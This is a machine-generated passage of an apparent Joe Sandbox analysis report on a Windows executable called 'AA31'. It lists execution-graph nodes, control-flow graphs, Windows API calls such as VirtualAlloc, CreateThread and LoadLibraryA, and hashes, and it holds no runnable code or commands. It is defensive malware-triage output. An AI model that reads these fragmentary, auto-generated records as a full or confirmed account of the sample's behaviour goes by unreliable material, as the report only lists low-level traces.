7ff65b042847 4732->4733 4734 7ff65b04280d 4732->4734 4733->4726 4735 
7ff65b0383d0 3 API calls 4734->4735 4736 7ff65b04281c 4735->4736 4737 7ff65b04283d 4736->4737 4738 7ff65b042842 4736->4738 4740 7ff65b0428bb 4737->4740 4741 7ff65b0428b1 4737->4741 4739 7ff65b0387d0 3 API calls 4738->4739 4739->4733 4743 7ff65b042a5e 4740->4743 4744 7ff65b0429d8 4740->4744 4745 7ff65b0429dd 4740->4745 4742 7ff65b0387d0 3 API calls 4741->4742 4742->4733 4747 7ff65b042a22 4744->4747 4748 7ff65b042a12 4744->4748 4746 7ff65b03e95a 3 API calls 4745->4746 4746->4733 4749 7ff65b042a70 3 API calls 4747->4749 4750 7ff65b03e95a 3 API calls 4748->4750 4749->4733 4750->4733 4752 7ff65b044c8a 4751->4752 4753 7ff65b044db9 4752->4753 4754 7ff65b044eb8 4752->4754 4757 7ff65b043f62 4752->4757 4755 7ff65b0387d0 3 API calls 4753->4755 4753->4757 4756 7ff65b0387d0 3 API calls 4754->4756 4754->4757 4755->4757 4756->4757 4757->4681 4757->4682 4759 7ff65b0439ca 4758->4759 4767 7ff65b043a82 4758->4767 4760 7ff65b043a69 4759->4760 4761 7ff65b043a6e 4759->4761 4759->4767 4793 7ff65b043310 4760->4793 4789 7ff65b04315c 4761->4789 4764 7ff65b043a9b 4765 7ff65b043b59 4764->4765 4768 7ff65b043b54 4764->4768 4766 7ff65b0387d0 3 API calls 4765->4766 4765->4767 4766->4767 4767->4727 4768->4767 4769 7ff65b03e95a 3 API calls 4768->4769 4769->4767 4771 7ff65b042aa0 4770->4771 4777 7ff65b042a8c 4770->4777 4772 7ff65b042b1d 4771->4772 4773 7ff65b042b13 4771->4773 4775 7ff65b042b8d 4772->4775 4776 7ff65b042b92 4772->4776 4774 7ff65b0387d0 3 API calls 4773->4774 4774->4777 4778 7ff65b042d1c 4775->4778 4779 7ff65b042db3 4775->4779 4776->4777 4780 7ff65b0387d0 3 API calls 4776->4780 4777->4707 4778->4777 4783 7ff65b0387d0 3 API calls 4778->4783 4781 7ff65b042de8 4779->4781 4782 7ff65b042dd8 4779->4782 4780->4777 4785 7ff65b042f4a 4781->4785 4787 7ff65b042f45 4781->4787 4784 7ff65b03e95a 3 API calls 4782->4784 4783->4778 4784->4777 4786 7ff65b0387d0 3 API calls 4785->4786 4786->4777 4787->4777 4788 7ff65b0387d0 3 API calls 4787->4788 4788->4777 4790 7ff65b043174 4789->4790 4812 7ff65b03e3b0 
4790->4812 4792 7ff65b04318a 4792->4767 4794 7ff65b043377 4793->4794 4795 7ff65b0434df 4794->4795 4796 7ff65b0434d5 4794->4796 4810 7ff65b043459 4794->4810 4798 7ff65b04356f 4795->4798 4799 7ff65b043574 4795->4799 4797 7ff65b0387d0 3 API calls 4796->4797 4797->4810 4801 7ff65b0435f9 4798->4801 4802 7ff65b0435ef 4798->4802 4800 7ff65b0387d0 3 API calls 4799->4800 4800->4810 4803 7ff65b04362e 4801->4803 4804 7ff65b04361e 4801->4804 4805 7ff65b0387d0 3 API calls 4802->4805 4807 7ff65b043737 4803->4807 4808 7ff65b04373c 4803->4808 4806 7ff65b03e95a 3 API calls 4804->4806 4805->4810 4806->4810 4807->4810 4811 7ff65b0387d0 3 API calls 4807->4811 4809 7ff65b0387d0 3 API calls 4808->4809 4809->4810 4810->4764 4811->4810 4813 7ff65b03e44e 4812->4813 4815 7ff65b03e71b 4812->4815 4817 7ff65b03e4cd 4813->4817 4818 7ff65b03bfe0 4813->4818 4815->4792 4817->4815 4826 7ff65b03e090 4817->4826 4819 7ff65b03c2a5 4818->4819 4824 7ff65b03c03f 4818->4824 4820 7ff65b03c4d1 4819->4820 4821 7ff65b03c43a 4819->4821 4822 7ff65b03c43f 4819->4822 4832 7ff65b03aff0 4821->4832 4848 7ff65b03bf2f 4822->4848 4824->4817 4827 7ff65b03e35a 4826->4827 4830 7ff65b03e0e6 4826->4830 4828 7ff65b03e0f2 4827->4828 4892 7ff65b03e029 4827->4892 4828->4815 4830->4828 4886 7ff65b03d900 4830->4886 4833 7ff65b03b00e 4832->4833 4834 7ff65b03b37f 4833->4834 4835 7ff65b03b8f7 4833->4835 4841 7ff65b03b37a 4833->4841 4836 7ff65b03b506 4834->4836 4840 7ff65b03b393 4834->4840 4837 7ff65b039e90 VirtualAlloc 4836->4837 4838 7ff65b03b51b 4837->4838 4838->4835 4844 7ff65b03aebf VirtualAlloc 4838->4844 4847 7ff65b03b4f7 4838->4847 4840->4835 4840->4847 4853 7ff65b039e90 4840->4853 4862 7ff65b03aebf 4840->4862 4841->4835 4846 7ff65b03aebf VirtualAlloc 4841->4846 4841->4847 4844->4847 4846->4847 4847->4835 4865 7ff65b03a9ce 4847->4865 4849 7ff65b0393c0 VirtualAlloc 4848->4849 4850 7ff65b03bf42 4849->4850 4851 7ff65b03a9ce VirtualAlloc 4850->4851 4852 7ff65b03bfd6 4851->4852 4852->4824 4854 7ff65b039ec5 4853->4854 4855 
7ff65b03a248 4854->4855 4857 7ff65b03a367 4854->4857 4861 7ff65b03a540 4854->4861 4855->4861 4868 7ff65b0393c0 VirtualAlloc 4855->4868 4858 7ff65b03a324 4857->4858 4859 7ff65b0393c0 VirtualAlloc 4857->4859 4858->4861 4870 7ff65b0398d0 4858->4870 4859->4858 4861->4840 4878 7ff65b03aa92 4862->4878 4882 7ff65b03a7c0 4865->4882 4869 7ff65b0393f7 4868->4869 4869->4858 4871 7ff65b0398f1 4870->4871 4873 7ff65b0399ae 4871->4873 4874 7ff65b039550 4871->4874 4873->4861 4875 7ff65b03958e 4874->4875 4876 7ff65b0393c0 VirtualAlloc 4875->4876 4877 7ff65b03967e 4875->4877 4876->4877 4877->4873 4879 7ff65b03ab66 4878->4879 4880 7ff65b03a9ce VirtualAlloc 4879->4880 4881 7ff65b03abc5 4880->4881 4883 7ff65b03a7e8 4882->4883 4884 7ff65b039550 VirtualAlloc 4883->4884 4885 7ff65b03a806 4883->4885 4884->4885 4885->4824 4888 7ff65b03d9a8 4886->4888 4889 7ff65b03d9ef 4886->4889 4887 7ff65b03df30 4888->4889 4891 7ff65b03aa92 VirtualAlloc 4888->4891 4889->4887 4890 7ff65b03aa92 VirtualAlloc 4889->4890 4890->4889 4891->4889 4893 7ff65b03e058 4892->4893 4894 7ff65b03e06c 4892->4894 4898 7ff65b03df4e 4893->4898 4895 7ff65b03d900 VirtualAlloc 4894->4895 4897 7ff65b03e067 4895->4897 4897->4828 4903 7ff65b03d7b0 4898->4903 4900 7ff65b03df90 VirtualFree 4901 7ff65b03e018 ExitProcess 4900->4901 4902 7ff65b03e023 4900->4902 4902->4897 4904 7ff65b03d7c2 4903->4904 4904->4900 4904->4904 4970 7ff65b0350df 4974 7ff65b0350e2 4970->4974 4971 7ff65b035257 4972 7ff65b03e95a 3 API calls 4971->4972 4973 7ff65b035293 4971->4973 4972->4973 4974->4971 4975 7ff65b038980 LoadLibraryA 4974->4975 4976 7ff65b0351bf 4975->4976 4976->4971 4977 7ff65b0351e9 4976->4977 4978 7ff65b038a80 3 API calls 4977->4978 4979 7ff65b035247 4978->4979

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: _initterm
                            • String ID: 0
                            • API String ID: 4163712557-4108050209
                            • Opcode ID: d0c91f69a36dc915e8c1dac5c1df33297561d19c6776b9ceb0e3a356a21a41d9
                            • Instruction ID: d015fd7b8217085a5fd0cdbfc6529c1d3dd1895de5b35bbc4cc4604cf38ce92d
                            • Opcode Fuzzy Hash: d0c91f69a36dc915e8c1dac5c1df33297561d19c6776b9ceb0e3a356a21a41d9
                            • Instruction Fuzzy Hash: B751B136E19B4689FB019B56E99477823A1FB4CB84F188436CE0CA77B8CE3CE4448760

                            Control-flow Graph

                            APIs
                            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00007FF65B1562FD), ref: 00007FF65B154FEE
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: InfoSystem
                            • String ID:
                            • API String ID: 31276548-0
                            • Opcode ID: 4435a1eed049c3fd0450f88751b0f5cfbfedae25248e736f52470c25bd2a7fc0
                            • Instruction ID: b3ab532575c648f356e030e9a85f9b63855c33b85a0dbcc1c1427e4cca07a3a1
                            • Opcode Fuzzy Hash: 4435a1eed049c3fd0450f88751b0f5cfbfedae25248e736f52470c25bd2a7fc0
                            • Instruction Fuzzy Hash: AEF03036639B8486DEA4DB2DE88142EB7A0F78C794F541135EA8E937B8DF2CD010CB00

                            Control-flow Graph

                            control_flow_graph 358 7ff65b0393c0-7ff65b0393f1 VirtualAlloc 359 7ff65b0393f7 call 7ff65b0393b1 358->359 360 7ff65b0393fc-7ff65b039487 358->360 359->360 362 7ff65b03948d-7ff65b039513 360->362 363 7ff65b039523 360->363 362->363 364 7ff65b039519-7ff65b039522 362->364
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 590cbdf70923415df278564712c069ad615679b58158710514d8b1ac31f48482
                            • Instruction ID: 32bda435fb9f86296dd3d76811f6bfa9d6e514d8a726b76ef9f11220d3abb9ed
                            • Opcode Fuzzy Hash: 590cbdf70923415df278564712c069ad615679b58158710514d8b1ac31f48482
                            • Instruction Fuzzy Hash: 78314962B7486003AB9C82799C37A7B25829789730B18A73DAA3BD7BF4DD2DD4410704

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: _ismbbleadmemset
                            • String ID:
                            • API String ID: 108173368-0
                            • Opcode ID: 57671fdf5fd48d660e387b34f2550a08a233dfe26c6519ce1e1df74da0d6ba48
                            • Instruction ID: b3fe14a01cb0062f8612f66e3afb09f07ccbbb7c689a05ea99a463d12f551660
                            • Opcode Fuzzy Hash: 57671fdf5fd48d660e387b34f2550a08a233dfe26c6519ce1e1df74da0d6ba48
                            • Instruction Fuzzy Hash: 76417D26F057599DFB108B65D5613BC3BB0AB09788F484075CE8CA7BA5DE3CD281C720

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AllocCreateThreadVirtual
                            • String ID:
                            • API String ID: 3065189322-0
                            • Opcode ID: 1ecd6ee78ea127f867ce216758fd444255d4e149dd627d0958e958b074ace42d
                            • Instruction ID: 3e679a1cec034dccd6ebfd35503a70b466b7e864a5c7cb6473f58839f91cd97b
                            • Opcode Fuzzy Hash: 1ecd6ee78ea127f867ce216758fd444255d4e149dd627d0958e958b074ace42d
                            • Instruction Fuzzy Hash: 84317432A09F85D5DB808F15F94126AB3A4FB88B80F684136EA8D9B734DF7DD059CB40

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: a0c6ea1e1d0c3704b1dec8672d4d704532c0c620c3fc467061c89ee7592a08bd
                            • Instruction ID: aa914598b4cbe3bfc6f8cfa924af94145839bae976d050d222f4b5c42dc130a8
                            • Opcode Fuzzy Hash: a0c6ea1e1d0c3704b1dec8672d4d704532c0c620c3fc467061c89ee7592a08bd
                            • Instruction Fuzzy Hash: 6E01F622729F8586DBA4CB65F49462EA7E4FB8D794F140535EA8E87B68DF3CC5108B00
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2497131956.00007FF65B031000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF65B030000, based on PE: true
                            • Associated: 00000007.00000002.2497095428.00007FF65B030000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497352169.00007FF65B20F000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497391613.00007FF65B21D000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B232000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B235000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497453294.00007FF65B297000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000007.00000002.2497567046.00007FF65B29B000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_7ff65b030000_AA31.jbxd
                            Similarity
                            • API ID: AddressProc$ExitProcess
                            • String ID: [i2T
                            • API String ID: 2636158824-4214777484
                            • Opcode ID: 1a6331b62f209788087938028dd1075342753dd5ba018f8267dff905bf1da63a
                            • Instruction ID: 728f52ace78654f4e0052084850a0db3d3ce02676d30d70d8c83a0a2e891aceb
                            • Opcode Fuzzy Hash: 1a6331b62f209788087938028dd1075342753dd5ba018f8267dff905bf1da63a
                            • Instruction Fuzzy Hash: 91F19F63B25B514AF758CA76DC516BE2AA397997A4F189334DD2DE7BE8CE3CC0414300

                            Execution Graph

                            Execution Coverage:1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:2.1%
                            Total number of Nodes:1775
                            Total number of Limit Nodes:15
                            execution_graph 5744 401440 5745 401451 5744->5745 5788 4026af HeapCreate 5745->5788 5748 401490 5840 405003 GetModuleHandleW 5748->5840 5751 401496 5752 4014a2 __RTC_Initialize 5751->5752 5753 40149a 5751->5753 5790 404953 5752->5790 5754 4013e8 _fast_error_exit 67 API calls 5753->5754 5755 4014a1 5754->5755 5755->5752 5757 4014af 5758 4014b3 5757->5758 5759 4014bb GetCommandLineW 5757->5759 5873 40368a 5758->5873 5805 4048f6 GetEnvironmentStringsW 5759->5805 5762 4014ca 5880 404848 GetModuleFileNameW 5762->5880 5765 4014d4 5766 4014e0 5765->5766 5767 4014d8 5765->5767 5811 404619 5766->5811 5768 40368a __amsg_exit 67 API calls 5767->5768 5770 4014df 5768->5770 5770->5766 5772 4014f1 5823 403749 5772->5823 5773 4014e9 5774 40368a __amsg_exit 67 API calls 5773->5774 5776 4014f0 5774->5776 5776->5772 5777 4014f7 5778 4014fc 5777->5778 5781 401503 __wwincmdln 5777->5781 5779 40368a __amsg_exit 67 API calls 5778->5779 5780 401502 5779->5780 5780->5781 5781->5780 5829 423af0 5781->5829 5783 401523 5784 401531 5783->5784 5884 4038fa 5783->5884 5887 403926 5784->5887 5787 401536 _flsall 5789 401484 5788->5789 5789->5748 5832 4013e8 5789->5832 5890 403354 5790->5890 5792 40495f GetStartupInfoA 5891 406728 5792->5891 5794 404b9e _flsall 5794->5757 5795 404b1b GetStdHandle 5800 404ae5 5795->5800 5796 406728 __calloc_crt 67 API calls 5799 404980 5796->5799 5797 404b80 SetHandleCount 5797->5794 5798 404b2d GetFileType 5798->5800 5799->5794 5799->5796 5799->5800 5802 404a68 5799->5802 5800->5794 5800->5795 5800->5797 5800->5798 5803 406b59 __mtinitlocknum InitializeCriticalSectionAndSpinCount 5800->5803 5801 404a91 GetFileType 5801->5802 5802->5794 5802->5800 5802->5801 5896 406b59 5802->5896 5803->5800 5806 404907 5805->5806 5807 40490b 5805->5807 5806->5762 5808 4066e3 __malloc_crt 67 API calls 5807->5808 5809 40492c _realloc 5808->5809 5810 404933 FreeEnvironmentStringsW 5809->5810 5810->5762 5812 404631 _wcslen 5811->5812 5816 4014e5 5811->5816 
404c65 6 API calls _raise 7151->7152 7152->7145 7152->7150 7152->7151 7154 4038c6 7153->7154 7155 4038eb 7153->7155 7154->7144 7157 402781 LeaveCriticalSection 7154->7157 7158 402781 LeaveCriticalSection 7155->7158 7157->7148 7158->7154 7307 406000 7317 405f84 7307->7317 7309 40602b setSBCS 7312 401006 __ftelli64_nolock 5 API calls 7309->7312 7311 406094 _memset __setmbcp_nolock 7324 405d4d GetCPInfo 7311->7324 7313 4061e3 7312->7313 7314 40606f IsValidCodePage 7314->7309 7315 406081 GetCPInfo 7314->7315 7315->7309 7315->7311 7318 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7317->7318 7319 405f98 7318->7319 7320 405fc1 7319->7320 7321 405fa3 GetOEMCP 7319->7321 7322 405fc6 GetACP 7320->7322 7323 405fb3 7320->7323 7321->7323 7322->7323 7323->7309 7323->7311 7323->7314 7325 405e33 7324->7325 7329 405d81 _memset 7324->7329 7328 401006 __ftelli64_nolock 5 API calls 7325->7328 7326 408993 ___crtGetStringTypeA 91 API calls 7327 405dee 7326->7327 7334 408794 7327->7334 7331 405ede 7328->7331 7329->7326 7331->7311 7333 408794 ___crtLCMapStringA 102 API calls 7333->7325 7335 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7334->7335 7336 4087a7 7335->7336 7339 4083ef 7336->7339 7340 408410 LCMapStringW 7339->7340 7343 40842b 7339->7343 7341 408433 GetLastError 7340->7341 7340->7343 7341->7343 7342 408629 7345 409824 ___ansicp 91 API calls 7342->7345 7343->7342 7344 408485 7343->7344 7346 40849e MultiByteToWideChar 7344->7346 7369 408620 7344->7369 7347 408651 7345->7347 7352 4084cb 7346->7352 7346->7369 7350 408745 LCMapStringA 7347->7350 7351 40866a 7347->7351 7347->7369 7348 401006 __ftelli64_nolock 5 API calls 7349 405e0e 7348->7349 7349->7333 7353 4086a1 7350->7353 7354 40986d ___convertcp 74 API calls 7351->7354 7357 4011ca _malloc 67 API calls 7352->7357 7366 4084e4 __crtLCMapStringA_stat 7352->7366 7356 40876c 7353->7356 7362 4010ad ___free_lconv_mon 67 API calls 7353->7362 7358 40867c 7354->7358 7355 40851c MultiByteToWideChar 7359 408535 LCMapStringW 
7355->7359 7360 408617 7355->7360 7367 4010ad ___free_lconv_mon 67 API calls 7356->7367 7356->7369 7357->7366 7363 408686 LCMapStringA 7358->7363 7358->7369 7359->7360 7361 408556 7359->7361 7364 4083cf __freea 67 API calls 7360->7364 7365 40855f 7361->7365 7371 408588 7361->7371 7362->7356 7363->7353 7372 4086a8 7363->7372 7364->7369 7365->7360 7368 408571 LCMapStringW 7365->7368 7366->7355 7366->7369 7367->7369 7368->7360 7369->7348 7370 4085d7 LCMapStringW 7373 408611 7370->7373 7374 4085ef WideCharToMultiByte 7370->7374 7376 4085a3 __crtLCMapStringA_stat 7371->7376 7378 4011ca _malloc 67 API calls 7371->7378 7375 4011ca _malloc 67 API calls 7372->7375 7377 4086b9 _memset __crtLCMapStringA_stat 7372->7377 7379 4083cf __freea 67 API calls 7373->7379 7374->7373 7375->7377 7376->7360 7376->7370 7377->7353 7380 4086f7 LCMapStringA 7377->7380 7378->7376 7379->7360 7382 408713 7380->7382 7383 408717 7380->7383 7385 4083cf __freea 67 API calls 7382->7385 7384 40986d ___convertcp 74 API calls 7383->7384 7384->7382 7385->7353 7159 406346 7162 402781 LeaveCriticalSection 7159->7162 7161 40634d 7162->7161 7649 4069c7 7652 40685b 7649->7652 7653 406872 7652->7653 7654 4068b3 7653->7654 7655 406898 7653->7655 7672 406876 7653->7672 7657 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7654->7657 7656 402666 __cftof2_l 67 API calls 7655->7656 7658 40689d 7656->7658 7659 4068be 7657->7659 7660 4025fe __cftof2_l 6 API calls 7658->7660 7661 406966 WideCharToMultiByte 7659->7661 7662 4068ca 7659->7662 7660->7672 7663 406998 GetLastError 7661->7663 7668 4068d8 _memset 7661->7668 7664 40690e _memset 7662->7664 7662->7668 7663->7664 7663->7668 7667 402666 __cftof2_l 67 API calls 7664->7667 7664->7672 7665 402666 __cftof2_l 67 API calls 7666 4068f0 7665->7666 7669 402666 __cftof2_l 67 API calls 7666->7669 7670 40691b 7667->7670 7668->7665 7668->7672 7669->7672 7671 4025fe __cftof2_l 6 API calls 7670->7671 7671->7672 7766 407287 7767 406728 __calloc_crt 67 API calls 7766->7767 7768 
407293 7767->7768 7769 404bf3 __encode_pointer 6 API calls 7768->7769 7770 40729b 7769->7770 7386 423d0f 7389 423b83 7386->7389 7390 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7389->7390 7391 423b97 7390->7391 7398 409d0b 7391->7398 7393 423bb7 7394 409d0b __forcdecpt_l 102 API calls 7393->7394 7397 423bc0 7394->7397 7396 423ba3 7396->7393 7402 4095d6 7396->7402 7399 409d29 7398->7399 7400 409d19 7398->7400 7407 409bf6 7399->7407 7400->7396 7403 4095e4 7402->7403 7404 4095f6 7402->7404 7403->7396 7419 409585 7404->7419 7408 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7407->7408 7409 409c0b 7408->7409 7410 409c17 7409->7410 7411 409c6b 7409->7411 7413 4078fb __isctype_l 91 API calls 7410->7413 7418 409c2f 7410->7418 7412 409c90 7411->7412 7414 4069e4 __isleadbyte_l 77 API calls 7411->7414 7415 402666 __cftof2_l 67 API calls 7412->7415 7416 409c96 7412->7416 7413->7418 7414->7412 7415->7416 7417 408794 ___crtLCMapStringA 102 API calls 7416->7417 7417->7418 7418->7400 7420 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 7419->7420 7421 409598 7420->7421 7422 4095b2 7421->7422 7423 4078fb __isctype_l 91 API calls 7421->7423 7422->7396 7423->7422 7771 40158e 7774 405190 7771->7774 7773 401593 7773->7773 7775 4051c2 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 7774->7775 7776 4051b5 7774->7776 7777 4051b9 7775->7777 7776->7775 7776->7777 7777->7773 7163 40154f 7164 401564 7163->7164 7165 40155e 7163->7165 7172 403935 7164->7172 7169 403910 7165->7169 7168 401569 _flsall 7170 4037ce _doexit 67 API calls 7169->7170 7171 403921 7170->7171 7171->7164 7173 4037ce _doexit 67 API calls 7172->7173 7174 403940 7173->7174 7174->7168 7778 406b91 7779 406b9d SetLastError 7778->7779 7780 406ba5 _flsall 7778->7780 7779->7780 7175 404254 7176 407c1d ___endstdio 105 API calls 7175->7176 7177 404259 7176->7177 7178 404267 7177->7178 7182 4079f4 7177->7182 7180 4010ad ___free_lconv_mon 67 API calls 7178->7180 7181 404272 
7180->7181 7183 407a00 _flsall 7182->7183 7184 40285b __lock 67 API calls 7183->7184 7191 407a0c 7184->7191 7185 407a75 7205 407a8a 7185->7205 7187 407a81 _flsall 7187->7178 7188 407a4a DeleteCriticalSection 7190 4010ad ___free_lconv_mon 67 API calls 7188->7190 7190->7191 7191->7185 7191->7188 7192 40967b 7191->7192 7193 409687 _flsall 7192->7193 7194 4096b8 7193->7194 7195 40969b 7193->7195 7197 404274 __lock_file 68 API calls 7194->7197 7203 4096b0 _flsall 7194->7203 7196 402666 __cftof2_l 67 API calls 7195->7196 7198 4096a0 7196->7198 7199 4096d0 7197->7199 7200 4025fe __cftof2_l 6 API calls 7198->7200 7208 409604 7199->7208 7200->7203 7203->7191 7282 402781 LeaveCriticalSection 7205->7282 7207 407a91 7207->7187 7209 409634 7208->7209 7210 409618 7208->7210 7213 40962d 7209->7213 7214 407a93 __flush 101 API calls 7209->7214 7211 402666 __cftof2_l 67 API calls 7210->7211 7212 40961d 7211->7212 7215 4025fe __cftof2_l 6 API calls 7212->7215 7224 4096ef 7213->7224 7216 409640 7214->7216 7215->7213 7227 409bc5 7216->7227 7219 405c88 __fileno 67 API calls 7220 40964e 7219->7220 7231 409af8 7220->7231 7222 409654 7222->7213 7223 4010ad ___free_lconv_mon 67 API calls 7222->7223 7223->7213 7225 4042e7 _fgetpos 2 API calls 7224->7225 7226 4096f5 7225->7226 7226->7203 7228 409648 7227->7228 7229 409bd5 7227->7229 7228->7219 7229->7228 7230 4010ad ___free_lconv_mon 67 API calls 7229->7230 7230->7228 7232 409b04 _flsall 7231->7232 7233 409b27 7232->7233 7234 409b0c 7232->7234 7236 409b35 7233->7236 7239 409b76 7233->7239 7235 402679 __close 67 API calls 7234->7235 7237 409b11 7235->7237 7238 402679 __close 67 API calls 7236->7238 7240 402666 __cftof2_l 67 API calls 7237->7240 7241 409b3a 7238->7241 7243 408112 ___lock_fhandle 68 API calls 7239->7243 7249 409b19 _flsall 7240->7249 7242 402666 __cftof2_l 67 API calls 7241->7242 7244 409b41 7242->7244 7245 409b7c 7243->7245 7246 